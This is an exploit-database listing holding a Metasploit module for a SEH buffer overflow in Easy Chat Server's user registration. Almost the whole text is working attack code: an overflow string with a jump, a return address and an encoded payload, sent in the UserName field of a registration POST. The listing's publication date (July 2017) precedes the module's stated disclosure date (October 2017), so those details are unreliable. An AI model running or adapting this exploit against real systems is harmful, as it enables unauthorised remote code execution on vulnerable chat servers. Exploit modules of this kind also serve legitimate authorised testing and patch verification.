Easy Chat Server User Registeration Buffer Overflow (SEH)



EKU-ID: 6793 CVE: OSVDB-ID:
Author: Marco Rivoli Published: 2017-07-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
      'Description'    => %q{
        This module exploits a buffer overflow during user registration in Easy Chat Server software.
      },
      'Author'         =>
        [
          'Marco Rivoli', #Metasploit
          'Aitezaz Mohsin' #POC
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '42155' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
        ],
      'DefaultOptions' => {
          'RPORT' => 80,
          'EXITFUNC' => 'thread',
          'ENCODER' => 'x86/alpha_mixed'
        },
      'DisclosureDate' => 'Oct 09 2017',
      'DefaultTarget'  => 0))
  end

  def exploit
    sploit = rand_text_alpha_upper(217)
    sploit << "\xeb\x06\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(200)

    res = send_request_cgi({
      'uri'    => normalize_uri(URI,'registresult.htm'),
      'method' => 'POST',
      'vars_post'  => {
        'UserName' => sploit,
        'Password' => 'test',
        'Password1' => 'test',
        'Sex' => 1,
        'Email' => 'x@',
        'Icon' => 'x.gif',
        'Resume' => 'xxxx',
        'cw' => 1,
        'RoomID' => 4,
        'RepUserName' => 'admin',
        'submit1' => 'Register'
      }
    })
    handler

  end
end